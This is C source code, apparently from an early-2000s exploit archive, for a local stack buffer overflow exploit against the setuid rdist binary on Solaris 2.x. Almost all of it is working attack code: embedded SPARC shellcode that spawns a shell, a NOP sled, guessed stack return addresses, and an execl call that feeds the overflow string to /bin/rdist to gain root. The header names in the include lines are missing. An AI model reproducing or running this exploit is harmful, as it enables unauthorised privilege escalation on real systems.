/* rdist solaris 2.* sploit */ /* by horizon. thanks to ktwo */ /* argv[1] is your offset */ #include #include #include #include #define BUF_LENGTH 1024 #define SAFETY 40 /* blind guess */ #define EXTRA 400 #define STACK_OFFSET 2360 #define SAFETY_OFFSET 248 #define SPARC_NOP 0xac15a16e u_char sparc_shellcode[] = "\x90\x08\x3f\xff\x82\x10\x20\x8d\x91\xd0\x20\x08" "\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68" "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14" "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01" "\x91\xd0\x20\x08"; int addr_ok(long a) { if (((a>>24)&255)==0) return 0; if (((a>>16)&255)==0) return 0; if (((a>>8)&255)==0) return 0; if (((a)&255)==0) return 0; return 1; } u_long get_safe_addr(long sp) { return sp-SAFETY_OFFSET; } u_long get_sp(void) { __asm__("mov %sp,%i0 \n"); } int main(int argc, char *argv[]) { char buf[BUF_LENGTH + EXTRA + 8]; char tempbuf[BUF_LENGTH + EXTRA + 8+6]; long stack,targ_addr,safe_addr; u_long *long_p; u_char *char_p; int i, code_length = strlen(sparc_shellcode),dso=0; if(argc > 1) dso=atoi(argv[1]); stack=get_sp(); safe_addr=get_safe_addr(stack); while(addr_ok(safe_addr)==0) safe_addr+=8; targ_addr = stack + STACK_OFFSET - dso; while(addr_ok(targ_addr)==0) targ_addr+=8; long_p =(u_long *) buf ; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP; char_p = (u_char *) long_p; for (i = 0; i < code_length; i++) *char_p++ = sparc_shellcode[i]; *char_p++=' '; *char_p++=' '; for (i = 0; i < SAFETY /4; i++) { *char_p++ =(safe_addr>>24)&255; *char_p++ =(safe_addr>>16)&255; *char_p++ =(safe_addr>>8)&255; *char_p++ =(safe_addr)&255; } for (i = 0; i < (EXTRA-SAFETY) /4; i++) { *char_p++ =(targ_addr>>24)&255; *char_p++ =(targ_addr>>16)&255; *char_p++ =(targ_addr>>8)&255; *char_p++ =(targ_addr)&255; } *char_p++=0; sprintf(tempbuf,"bleh=%s",&buf[2]); printf("Stack address: 0x%lx. Safe address: 0x%lx (delta %d).\n", stack,safe_addr,stack-safe_addr); printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n", targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET); execl("/bin/rdist","rdist","-d",tempbuf,"-c","/tmp/","${bleh}",(char *) 0); perror("execl failed"); } /* www.hack.co.za [2000]*/